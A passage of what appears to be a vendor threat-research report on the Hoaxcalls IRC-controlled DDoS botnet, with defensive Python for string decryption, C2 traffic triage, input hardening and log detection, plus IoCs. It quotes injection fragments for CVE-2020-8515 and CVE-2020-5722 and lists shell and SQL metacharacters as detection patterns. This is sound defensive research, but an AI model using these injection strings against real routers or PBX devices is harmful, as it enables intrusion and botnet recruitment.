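    """Mirai's table_unlock_val: every byte is XORed with all four key bytes."""
    k1, k2, k3, k4 = key_bytes(key)
    return bytes(b ^ k1 ^ k2 ^ k3 ^ k4 for b in data)


def decrypt_sequential(data, keys=TABLE_KEYS):
    """Apply each key in turn, the way a multi-key variant would."""
    for key in keys:
        data = xor_with_key(data, key)
    return data


def effective_byte_key(keys=TABLE_KEYS):
    """XOR is associative and commutative, so all key bytes fold into one."""
    k = 0
    for key in keys:
        for b in key_bytes(key):
            k ^= b
    return k


def decrypt_single(data, keys=TABLE_KEYS):
    """Equivalent shortcut: one XOR with the folded key (0xEC for these keys)."""
    k = effective_byte_key(keys)
    return bytes(b ^ k for b in data)


def build_sample_table():
    """Constructed stand-in for the binary's string table: the two plaintexts
    quoted in the post, encrypted with the scheme above (XOR is symmetric,
    so encryption and decryption are the same operation)."""
    plain = {0x21: b"hubnr and vbrxmr was here", 0x01: b"afsadhgqegtx5425"}
    return {idx: decrypt_sequential(s) for idx, s in plain.items()}


def dump_table(table):
    """Decrypt every entry, as an analyst would when recovering Table 1."""
    return {idx: decrypt_single(enc).decode("ascii") for idx, enc in sorted(table.items())}


if __name__ == "__main__":
    print(f"effective key: 0x{effective_byte_key():02X}")
    for idx, text in dump_table(build_sample_table()).items():
        print(f"0x{idx:x}: {text}")
```

Running the script prints the folded key 0xEC and the two recovered strings; on a real sample the same dump_table() logic is applied to the table extracted from the binary, with decrypt_sequential() serving as a cross-check that the shortcut key was derived correctly.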

Table 1 below shows the complete list of the decrypted strings and their corresponding indices. The decrypted string at index 0x1 is used in rand_alpha_str(), and the strings at indices 0x2 through 0xa are used when the malware starts the watchdog process.

Table Index Decrypted String
0x21 hubnr and vbrxmr was here
0x1 afsadhgqegtx5425
0x2 /dev/watchdog
0x3 /dev/misc/watchdog
0x4 /sbin/watchdog
0x5 /bin/watchdog
0x6 /dev/FTWDT101_watchdog
0x7 /dev/FTWDT101/watchdog
0x8 /dev/watchdog0
0x9 /etc/default/watchdog
0xa /etc/watchdog
0xd /dev/netslink/
0xe STD
0xf /usr/bin/python
0x11 /status
0x12 /proc/
0x13 /exe
0x14 /fd
0x15 /proc/net/tcp
0x16 /maps
0x17 /mnt/
0x18 /root/
0x19 /tmp/
0x1a /var/
0x1b /home/
0x1c UPX!
0x1d PR_SET_NAME
0x1e /cmdline

Table 1. Decoded credentials and commands

The bot then connects to its C2 server 178[.]32[.]148[.]5 on TCP port 1337 over IRC. The C2’s IRC channel is #hellroom. The nick, ident, and user are 13-character strings that always start with XTC|, followed by 9 random characters. The following figure shows the bot’s communication with its C2 server over IRC.

Figure 1. Connect to its C2 over IRC

Based on the command received from its C2 server, hoaxcalls carries out different kinds of operations. The following tables show the bot’s supported commands as well as the kind of DDoS attacks hoaxcalls has employed.

Bot Commands Description
352 set spoof IP addr
376 report nickname, channel, and the key
433 reset nickname with a new random string
422 same as command 376
PRIVMSG handle flooder command
PING respond with a PONG message
NICK assign nickname with a designated value

Table 2. Bot’s supported commands

Flooder Commands Description
UDP launch UDP flood against specified target
HEX launch HEX flood against specified target
DNS launch DNS flood against specified target
DRAYTEK scan and infect other Draytek devices by exploiting CVE-2020-8515
UCM scan and infect other Grandstream UCM devices by exploiting CVE-2020-5722
HELP display command usage
RULES display rules to follow when using the botnet
INFO display a brief intro about the bot

Table 3. Flooder commands
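The C2 profile described above (TCP port 1337, channel #hellroom, the XTC| naming pattern, and the flooder keywords of Table 3) can be turned into a triage check for captured IRC sessions. The Python below is an added example, not the post's or the malware's code; the sessions it scans are constructed, and whatever follows a flooder keyword in a PRIVMSG is ignored because the post does not describe that argument format.

```python
import re

# Indicators quoted in the post for the group 1 samples.
C2_PORT = 1337
C2_CHANNEL = "#hellroom"
# nick, ident and user: "XTC|" followed by 9 random characters (13 in total).
XTC_NAME_RE = re.compile(r"^XTC\|[A-Za-z0-9]{9}$")
# Flooder command names from Table 3; HELP/RULES/INFO are weak on their own.
FLOODER_COMMANDS = {"UDP", "HEX", "DNS", "DRAYTEK", "UCM", "HELP", "RULES", "INFO"}


def parse_irc(line):
    """Split a raw IRC line into (prefix, command, params), RFC 2812 style."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, _, trailing = line.partition(" :")
    params = head.split()
    if trailing:
        params.append(trailing)
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def inspect_line(line):
    """Return the reasons a single IRC line matches the Hoaxcalls C2 profile."""
    reasons = []
    _, cmd, params = parse_irc(line)
    if cmd in ("NICK", "USER") and params and XTC_NAME_RE.match(params[0]):
        reasons.append(f"{cmd} uses the XTC| naming pattern")
    if cmd == "JOIN" and params and params[0].lower() == C2_CHANNEL:
        reasons.append(f"joins {C2_CHANNEL}")
    if cmd == "PRIVMSG" and len(params) >= 2:
        text = params[-1].strip().lstrip("!.")
        first_word = text.split()[0].upper() if text else ""
        if first_word in FLOODER_COMMANDS:
            reasons.append(f"flooder command {first_word}")
    return reasons


def triage_session(dst_port, lines):
    """Score one client session: (verdict, [(line_no, reason), ...])."""
    findings = [(n, r) for n, line in enumerate(lines, 1) for r in inspect_line(line)]
    score = len(findings) + (1 if dst_port == C2_PORT else 0)
    verdict = "hoaxcalls-c2" if score >= 2 else "suspicious" if score == 1 else "clean"
    return verdict, findings


# Constructed sessions (not real captures). The argument format after a
# flooder keyword is not described in the post, so none is used here.
SAMPLE_SESSION = [
    "NICK XTC|aB3kZ9qLm",
    "USER XTC|aB3kZ9qLm 0 * :XTC|aB3kZ9qLm",
    "PING :irc.example",
    "PONG :irc.example",
    "JOIN #hellroom",
    ":op!op@c2.example PRIVMSG #hellroom :DRAYTEK",
]
BENIGN_SESSION = [
    "NICK alice_42",
    "USER alice_42 0 * :Alice",
    "JOIN #python",
    "PRIVMSG #python :hello everyone",
]

if __name__ == "__main__":
    for port, session in ((C2_PORT, SAMPLE_SESSION), (6697, BENIGN_SESSION)):
        print(triage_session(port, session))
```

The score deliberately mixes weak and strong signals: a destination port alone, or a stray HELP in channel chatter, yields only "suspicious", while the XTC| naming pattern and the #hellroom channel together are what push a session to the "hoaxcalls-c2" verdict.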

The following Figures 2 and 3 show the exploit code when the bot is scanning and infecting any potentially vulnerable victims.

Figure 2. CVE-2020-8515 exploit in hoaxcalls group 1
Figure 3. CVE-2020-5722 exploit in hoaxcalls group 1

The flooder commands described above are based on Hoaxcalls samples in group 1. We have found other groups of variants that are essentially the same in terms of capabilities, despite a few nuances. For example, the Hoaxcalls samples in group 1 employ the DrayTek and UCM scanning functionality as part of the C2 flooder command set. The samples in groups 2 and 3, however, move the propagation functionality out of the flooder commands and instead start infecting vulnerable UCM and DrayTek devices upon execution. The malicious requests sent during the infection phase also differ slightly. The figures below show the differences between samples from the different groups.

Figure 4. CVE-2020-8515 exploit in hoaxcalls group 2
Figure 5. CVE-2020-5722 exploit in hoaxcalls group 2
Figure 6. CVE-2020-8515 exploit in hoaxcalls group 3
Figure 7. CVE-2020-5722 exploit in hoaxcalls group 3
Figure 8. Comparison of samples’ main()

Vulnerability Analysis

CVE-2020-8515

The executable /www/cgi-bin/mainfunction.cgi doesn’t properly filter the keyPath parameter during authentication, resulting in exploitable command injection. The attacker can prepend the payload with special characters like %27%0A (a URL-encoded single quote and newline) to bypass the check and achieve pre-authentication command execution. The vulnerability has been observed being exploited in the wild since December 2019.

CVE-2020-5722

The Grandstream UCM6200 doesn’t properly validate the user_name parameter, resulting in SQL injection when the Forgot Password feature queries the backend SQLite database and invokes sendMail.py via popen(). The attacker can supply a default username such as admin followed by SQL syntax and shell metacharacters (' or 1=1--;), effectively turning this vulnerability into command execution. According to the published advisory, this vulnerability can also be exploited through HTML injection. Only the first exploitation method has been observed in the current ongoing attacks.
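Both bugs belong to the same defect class: attacker-controlled parameters reaching a shell or a query string uninterpreted. The Python below is an added illustration, not the vendors' code, of the defensive pattern for each: an allowlist check on a keyPath-like parameter that decodes before validating, and a forgot-password handler that binds the user_name value into a parameterized SQLite query and hands it to the mail helper as an argv list rather than through popen(). The table schema, the allowlists and the helper's option names are assumptions; the vulnerable lookup is kept beside the hardened one only to show how the two behave on the ' or 1=1-- input from the post.

```python
import re
import sqlite3
from urllib.parse import unquote

# Allowlists are assumptions for this example, not the vendors' rules: a real
# product would derive them from the values each parameter may legitimately take.
KEYPATH_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./-]{0,127}$")
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def keypath_ok(raw):
    """CVE-2020-8515 class: decode first, then allowlist. The %27%0A prefix from
    the post is a quote and a newline once decoded and fails the pattern."""
    value = unquote(raw)
    return ".." not in value and KEYPATH_RE.match(value) is not None


def username_ok(raw):
    """CVE-2020-5722 class: a username never legitimately contains quotes,
    spaces, comment markers or shell metacharacters."""
    return USERNAME_RE.match(unquote(raw)) is not None


def make_db():
    """Constructed in-memory stand-in for the device's SQLite user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin@example.invalid"), ("alice", "alice@example.invalid")])
    return conn


def lookup_email_vulnerable(conn, user_name):
    """Query built by string formatting: the input can rewrite the WHERE clause."""
    sql = f"SELECT email FROM users WHERE user_name = '{user_name}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_email_hardened(conn, user_name):
    """Validate, then bind the value; the query shape is fixed at compile time."""
    if not username_ok(user_name):
        return None
    sql = "SELECT email FROM users WHERE user_name = ?"
    return [row[0] for row in conn.execute(sql, (user_name,))]


def build_mail_argv(user_name, email):
    """Hand user data to the mail helper as separate argv entries instead of a
    popen() shell string, so metacharacters are never interpreted. The helper's
    option names are assumed; subprocess.run(argv) would execute it (not run here)."""
    return ["/usr/bin/python", "sendMail.py", "--user", user_name, "--to", email]


def forgot_password(conn, user_name):
    """Hardened handler: returns the argv to run, or None when the request is refused."""
    emails = lookup_email_hardened(conn, user_name)
    if not emails:
        return None
    return build_mail_argv(user_name, emails[0])


if __name__ == "__main__":
    db = make_db()
    probe = "admin' or 1=1--;"
    print("vulnerable:", lookup_email_vulnerable(db, probe))
    print("hardened:  ", forgot_password(db, probe))
    print("legit:     ", forgot_password(db, "admin"))
```

The two layers are independent on purpose: the allowlist stops malformed input at the edge, and parameter binding plus argv-style process invocation mean that even a value which slips past validation cannot change the query or be parsed by a shell.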

Exploit in the Wild

Our Next-Generation Firewall caught the first CVE-2020-8515 exploitation attempt on March 31, 2020 at 13:51 (UTC). In addition to this attack, several bots’ attempts to propagate by exploiting CVE-2020-5722 were also caught by our firewall. In the CVE-2020-8515 case, the threat actor attempted to download a shell script to the tmp directory and execute it, as shown in Figure 9. In the CVE-2020-5722 case, the payload only downloads an arm7 binary and executes it, as shown in Figure 10.

Figure 9. CVE-2020-8515 exploit spotted in the wild
Figure 10. CVE-2020-5722 exploit spotted in the wild
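For defenders who do not have the figures, the two exploitation attempts described above can be recognised in web-server or proxy logs from their parameters: a request to /cgi-bin/mainfunction.cgi whose decoded keyPath carries a quote, newline or other shell metacharacter, and a request whose user_name carries SQL quote or comment characters. The Python below is an added example, not a Palo Alto Networks signature; the request records are constructed, with placeholders where the real payload and the UCM endpoint path would be.

```python
from urllib.parse import parse_qs, urlsplit

# Metacharacters that have no place in these two parameters (assumed lists).
SHELL_META = set("'\n\r;|`&$")
SQL_META = ("'", "--", "/*", ";")
DRAYTEK_CGI = "/cgi-bin/mainfunction.cgi"


def request_params(req):
    """Merge URL-decoded query-string and body parameters of one request."""
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    params.update(parse_qs(urlsplit(req["path"]).query, keep_blank_values=True))
    return params


def check_request(req):
    """Return the rule names a single request record triggers."""
    hits = []
    params = request_params(req)
    if urlsplit(req["path"]).path.endswith(DRAYTEK_CGI):
        if any(set(v) & SHELL_META for v in params.get("keyPath", [])):
            hits.append("CVE-2020-8515 keyPath injection attempt")
    if any(m in v for v in params.get("user_name", []) for m in SQL_META):
        hits.append("CVE-2020-5722 user_name injection attempt")
    return hits


def scan_requests(records):
    """Run the checks over a batch; returns (record index, source, rule)."""
    return [(i, req["src"], hit) for i, req in enumerate(records) for hit in check_request(req)]


# Constructed request records, not real captures. Bodies carry placeholders
# instead of payloads; the forgot-password path is a placeholder too, since the
# user_name rule does not depend on it.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "POST", "path": DRAYTEK_CGI,
     "body": "keyPath=%27%0APLACEHOLDER&user=a"},
    {"src": "203.0.113.11", "method": "POST", "path": DRAYTEK_CGI,
     "body": "keyPath=default&user=admin"},
    {"src": "198.51.100.7", "method": "POST", "path": "/PLACEHOLDER/forgot_password",
     "body": "user_name=admin%27+or+1%3D1--%3B&email=x%40example.invalid"},
    {"src": "198.51.100.8", "method": "GET", "path": "/status", "body": ""},
]

if __name__ == "__main__":
    for index, src, rule in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index} from {src}: {rule}")
```

Decoding before matching is the important detail: the %27%0A sequence is harmless as text and only becomes a quote and a newline after URL decoding, which is also the point at which the vulnerable CGI would interpret it.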

The following figure shows the content of the downloaded shell script, sh. Upon execution, the sh script downloads builds of the DDoS bot for different architectures and runs the downloaded binaries. None of the malware samples was available on VirusTotal at the time of our discovery; however, many of them were uploaded to VirusTotal not long after. More and more attack traffic is being detected at the time of writing, indicating that many devices are probably already infected.

Figure 11. Shell script that downloads and launches the bots

Conclusion and Mitigation

Hoaxcalls, a new DDoS botnet, is actively exploiting two vulnerabilities that have wide exposure in environments around the world. According to other security research organizations, the same vulnerabilities are also being exploited in additional attacks. Unfortunately, they are easily exploited and lead to remote code execution; as such, we advise everyone to patch as soon as possible.

Palo Alto Networks customers are protected from the aforementioned vulnerabilities by the following products and services:

    • Next-Generation Firewalls with a Threat Prevention license can block the attacks, following best practices, via threat prevention signatures 57897 and 57892.
    • WildFire can stop the malware with static signature detections.
    • PAN-DB blocks the malicious domains used by the malware.

IoCs

File (SHA256)

Group1:

762ba1a2f7d62b8fc206ffb1bf39e89db651a1abb584402f9939d91a5b7899d3 arm4

ae447f9cad4f4909c576c577a94aa3d38be7b9636c9b7fb04a181caca42ea92b arm5

8777e47ab84fb681379b2253735aa1490d69e94201d57f06334c9ddfb1063637 arm6

695a0b2ef0d46027d2f106c060dade52b34e3bb7342a8eae906c7d2b15a99fc3 arm7

53aaee7d0de64b71ea0c61ec62b4fb509850f915b574b2560e98692057d32a1c i486

df5ba0630a0fe701afccc129be7e9612cb4016dcc70273b748dad66dc152b6e9 i586

e2dc3e0956a818fb22a77c50d9cfe91b7639c727db8a6838efd368ba277664b1 i686

f4cf6a033aac287ff0b5171ce6f64836691b822f76705b04445f52f643da8c10 m68k

72492605815c59579170adef1519231a5e3f17ada26428d20bd7948041c812a3 mips

9a62763da3dc8c1de87b50271a7b446e753016f72f5631e1c6eb17ff5425e7ab mips64

b7b94fac1067217914d99f2d98b34c310a6c53eb36d3a430eea5df8217c4d1f8 mpsl

41ef0133acaca395ea957e796dc1b939b9825b1414541c616b8ca8bdfadb8d16 ppc

c3ea39b0cc786dcda73821f60b42d84c9557e9e590d7f3b4a328eb7a6e6559f4 ppc440

19270639537a2241861eae2bbf4b4095fc6e1915e4dee476d2e4f277992733fd sh

82bb86e2041f4e37187ceb93bcbc48bd8311274ef33a166c6a8e0e9ffe33b585 sh4

b32dcd47377b781c17a6ae7c88d4e1a4294d539ba8f452d980b78a9611d1cb6f spc

aa69b3ac7b55fff5dde4491e4153954b31c36d528fdb390495b9bd7bc1a0c77b x86

Group2:

f31c7e7be06d8d6ec13337c76ca86b3692b3f5d7632e20b725d3542b3e316e62 arm4

e31d945930048f0c06a84942212e5a14b75cee7538fbf0c9c0e1759546c7f6b9 arm5

ded7ce9588d47885fc6a9a360e1d3561478d4be71d0971aaf76995621eb94db3 arm6

0820eba0c16325b9cd24c54d6655f6d9aeb2e28b4fc82d6da598b71139aceb5e arm7

df4e8168357559280db011eaf88088a8493b6e20df4ace06069b93c6d28af3ee i486

931b1e85e19b138a4a3bf3890749b8884a5ff4a6b34c1df3b9083d7f304e5694 i586

06d019d1266bb345fc85df991b419474026d3e21a8b8a1328bad77fbfeb8cb00 m68k

6be47cf2f418d9729cdb1eb03885ab14e07a5955e63b06062fec97b567f959de mips

3c66db7df3f84633dbe6ed7b84911d7202c53968b88861f2463a152c839e89bf mips64

8a77f9843174a53a5909554589177ce7e32d6a36a6c6ef868e4c118f98069641 mpsl

7a5d8752049afdc8060d6a27407dcddfd9d7642c14600f586767c67afe0ef64b ppc

c0df164ac0af7cca5cb02e66d181bc80ed9d58cec038b82ed170ebb75b78645f ppc440

72d6846b9e004662cd7f2d10fdc66d02ca9b5eb545582529a935f6ff5cd2a9e7 sh4

02eb5d0d8ddbd68ff459b3bb388484b841ac23cb9604b9a9e503f9dcf9c49186 spc

27fc18936f445fc0d2ede1d6fb301594d352d86268b4b1590dad535c7051c5ef x86

Group3:

f62819deb8fe2a96fa34137f6eb1d5e2e0a8e52594f9a51e78f4a2c13f5a7b96 arm4

c0a958ea24c585d1bc99b562835e95f7d2c4a57674085df668dbbf7baa2b9fe8 arm5

b6619dbeb420f4ee824115987c116540604356b115641d1f3c740846689b6a7b arm6

65100dbe19870b6be1b398c6185b25d3a502dfb2b5166ba0d1a938b607ea1880 arm7

527bd14dfec20820e84c64b0f0924ae1272d9d3920b38c998a131a21e53a5789 i486

a27c04ce5769953e860ed473641c1a562293d01b75230bbcb803d66df4512daf i586

3ffc07cb1c7c08a5b43e4acfefbab9cb45df88bc9bd8dc2bcb489d350e18c8a1 i686

59f71ff3d2df1f8c3f12e2844b78545de1fdfdabc1d80a7221ad75b24af986e2 m68k

9fe8885439dec03cc0056324b5e2910d363ea139e7167bc9257c2cf7a9e1ba33 mips

0a210410ef5f5cb85b2aa0e0530cb7763f354850f25cd9763b1154126f92c699 mips64

ef7b2e41bf4cbb4d99ca37f028ccae3f47a2b8e21b6fd46f15fe34d3bcf1395a mpsl

20d1e4ee888c2af8ee9b169f6c32290f3c378aa616519e374c7b15b6f7e4e3cf ppc

eb225d38828ae996463586554ddc2d30507e9e472667ae92a61ccb13c39a42f4 ppc440

73bbf4b38904cc17b5267064dda940a080965aa55a1a9d93dd36d21720ea91dc sh

388acd6a1a2ce446247f88b2370fda71092bbc28f7af3cbd759d6f97b9ab26fd sh4

5dbf6618d2d5e54d209f2befd4873c1c361893e822ca614cca9bad18aca75e01 spc

54df5531d1fdd8bb4f1d499ccbe055506a840860fcc08bf4d31bcc8a02296113 x86

Other samples making use of the same 2 exploits:

02eb5d0d8ddbd68ff459b3bb388484b841ac23cb9604b9a9e503f9dcf9c49186

06d019d1266bb345fc85df991b419474026d3e21a8b8a1328bad77fbfeb8cb00

07b71cd9093e22fd89e2e0ce9c4a67f93675bb227724b4f7542ab66c67097d45

0820eba0c16325b9cd24c54d6655f6d9aeb2e28b4fc82d6da598b71139aceb5e

0a1951d5488b70e5f9c504c8134adfff5cbd52c5bee87b41a69ba46c978751aa

0de057cd8075a7a95dc7ce18632c2a342d69fa26700c52ccc256dc0bf37198c7

0deb223ebb948619f0f6de334c2f7e0390547e0f905d54556c29605b3d6b8a26

19409cb3169c3bfad4e65a1c4d18df855c87eff63683bd2b93aa36dee746cef8

256db410dcc76f2ada308a20a6cfa489a26a5b7aac44ed122d12ac66c8070c7f

27fc18936f445fc0d2ede1d6fb301594d352d86268b4b1590dad535c7051c5ef

293d534fca05c2383849d50eb77a4e61c0b30b91f02dc9dd89fb7bf826eb83e5

2cac4daa388fbacc05ae0f99e9c146c18e70e89ab95b6ae649abddca9f801267

302af2e17c4ecdc468ab59b8f86d5b3adb824406685027d297f63bd7a7c80685

323fb07dfd54a485665468d97a94dcdbdb4c469c5a1a7af9e15f83a7d667f4ea

34322b2641c5dba9e044d3acd855da3943fc456dc9be05cc402f1ab730d97321

3a2138786d012af66ac49e4ae3de97efb852006ecdd356da40a5c98d1cfbd872

3b9d527d7e67465d78b14e4a628e68903de01127e7409afce61d4ca7ba0dfbbf

3c66db7df3f84633dbe6ed7b84911d7202c53968b88861f2463a152c839e89bf

3d96d12f434173e0c5691f26c980b1157dd84f77df98de61f2f214fbb34c0a84

41ef0133acaca395ea957e796dc1b939b9825b1414541c616b8ca8bdfadb8d16

41f98a985173d4f92f97f7b6d679b3078b0288caafcbf3033209b9e08aacd721

488821f7809673e380e50a8eec24db5bb00b4cfe9176ec85bdf8b17eca13ebcf

48a595e19720dcd6a57aa8647422a21a4680a3642e4bee8975a5f17da71b6994

49344ceb14a65041a09530d5d21498c0efb7c52acb8b0f06b6983922e4edfe41

50cff66f9e2a20f78d7e76c8db316c6e9bd09c019f80ac91c9e3016d26abfeb4

51138ebb4e773e822ceace1b571d4a72269ada92d6ddec8639ba1d558ffa7d35

523cfd05d0b10607bccf1a76bc9dc208a267be18dc274653a2300fb73d805e3b

53aaee7d0de64b71ea0c61ec62b4fb509850f915b574b2560e98692057d32a1c

5d9e24cdd842e6f8439c86b533c842ab41c4ddb6909301b52cda9430f7bb86a7

6330b698bca0fcfbf2883c597454dcec7ade3a5bf6d25f5770e4f37100e17bde

66e65a7273221bed3a7bd34d01ba87182e4940cf8d61ce6a440cfb4a88496855

695a0b2ef0d46027d2f106c060dade52b34e3bb7342a8eae906c7d2b15a99fc3

6be47cf2f418d9729cdb1eb03885ab14e07a5955e63b06062fec97b567f959de

72492605815c59579170adef1519231a5e3f17ada26428d20bd7948041c812a3

72d6846b9e004662cd7f2d10fdc66d02ca9b5eb545582529a935f6ff5cd2a9e7

762ba1a2f7d62b8fc206ffb1bf39e89db651a1abb584402f9939d91a5b7899d3

77d3d79c2c53b88b557f1aad6bae6f9d6ec92c1b1c043a95894620bbbbfce4be

79f59593d4a1a669bf8e2ef8749eb556303fbcaed032c67a52b03b696fe2f8de

7a5d8752049afdc8060d6a27407dcddfd9d7642c14600f586767c67afe0ef64b

7dc6eea0dd325291a06c7769b268fca01bb3d89f0e86ba4c4633bc17751a383f

822dd6afb32059b6235ad56f931457bf82b824c977f47abc446102fe7c0647b3

82bb86e2041f4e37187ceb93bcbc48bd8311274ef33a166c6a8e0e9ffe33b585

837cf1d050c89e28d0a847307641c2ad9ffc94d31f692dbdf496982e951e0fdf

84492d0457a2a1f57afd965c64c40ee63fcb3054754bdfae5046c0b940750582

8777e47ab84fb681379b2253735aa1490d69e94201d57f06334c9ddfb1063637

8a77f9843174a53a5909554589177ce7e32d6a36a6c6ef868e4c118f98069641

8f5543556ed0929a755b512d58fc97643d4f3685b7b01f6e18c291e35ceb54cf

931b1e85e19b138a4a3bf3890749b8884a5ff4a6b34c1df3b9083d7f304e5694

97694a5bf3585ef6d1a4cb8841872fedc557bd19ee159015a74bf964fa73dde0

97b13f8e073bf88557cf4263f5dabded8e9979e0f1aadae449241655ed0d8499

992b72da60cc4f1756b0a6342e5e71979f54ef6eba22c4faf7106e894ca062cd

9a62763da3dc8c1de87b50271a7b446e753016f72f5631e1c6eb17ff5425e7ab

9e4bf806a3f6986a981fd2fb8a14f99008fda1fd38738316d12d2a742096b6e9

aa69b3ac7b55fff5dde4491e4153954b31c36d528fdb390495b9bd7bc1a0c77b

ae447f9cad4f4909c576c577a94aa3d38be7b9636c9b7fb04a181caca42ea92b

ae692f3134e0fddbdf0cc41e176ede7d2a525fa8155b7b4724956ba2d51d7589

aef1d674b7b21e3210dba61028083a6537406922b87730b9494f3a3f75eb07a3

b32dcd47377b781c17a6ae7c88d4e1a4294d539ba8f452d980b78a9611d1cb6f

b3afdfdd65e8d21e5a6d35969c9d315ee6f937364adaabebb5913e642d6feede

b7b94fac1067217914d99f2d98b34c310a6c53eb36d3a430eea5df8217c4d1f8

b8fefd64070ae89ac7d6e9f1423bcf14785d7c5ff2d7417451264710f30b54cc

c0df164ac0af7cca5cb02e66d181bc80ed9d58cec038b82ed170ebb75b78645f

c3ea39b0cc786dcda73821f60b42d84c9557e9e590d7f3b4a328eb7a6e6559f4

cf0ec3f0ee8f7d538e3fa2d678d90fea26907ccf56a9dd77a7056d57b0c63bdb

d183596356b00d86bd6a3b647b170978e47d39a3e8cb33d6e30fbb8af111e314

d48b0c35cc931dd84664824a14b1675978b40bcaeee8aab2b06eaa0a7b41d8f3

ded7ce9588d47885fc6a9a360e1d3561478d4be71d0971aaf76995621eb94db3

df4e8168357559280db011eaf88088a8493b6e20df4ace06069b93c6d28af3ee

df5ba0630a0fe701afccc129be7e9612cb4016dcc70273b748dad66dc152b6e9

e07fe92781177ca0baf00bd456e9dabe6496ae86df1db2bd5ff5e2dcbbbee158

e11ca4bde56d2c7711a777421b445a53601516142dc949f97477f0c1458bff1e

e2dc3e0956a818fb22a77c50d9cfe91b7639c727db8a6838efd368ba277664b1

e31d945930048f0c06a84942212e5a14b75cee7538fbf0c9c0e1759546c7f6b9

e32106c161081bcea765017657215c5f97f837dc68aa51ff0f24ce9fefaac7e3

e54d1842519820f02ab8e1560f666f112d636de74c11729b41739dfb316fa3a5

e9bd90e5807af36bc2cca9769188a39050aa7ae6c193e67c588a73a555149f71

eab4b5a1f32cbd0840adb19e8f189019fbf9b20508883a15d3bdecd90bffad28

f21a9dc8f9c16a942e9c18729813bd3fb9f6e1408df68731160d7fe506f29bc6

f31c7e7be06d8d6ec13337c76ca86b3692b3f5d7632e20b725d3542b3e316e62

f4cf6a033aac287ff0b5171ce6f64836691b822f76705b04445f52f643da8c10

Network

178[.]32[.]148[.]5:1337 (Command and Control)

18[.]185[.]109[.]135:1337 (Command and Control)

192[.]3[.]45[.]185 (Malware Hosting Server)

164[.]132[.]92[.]180 (Malware Hosting Server)

irc[.]hoaxcalls[.]pw (Malware Hosting Server)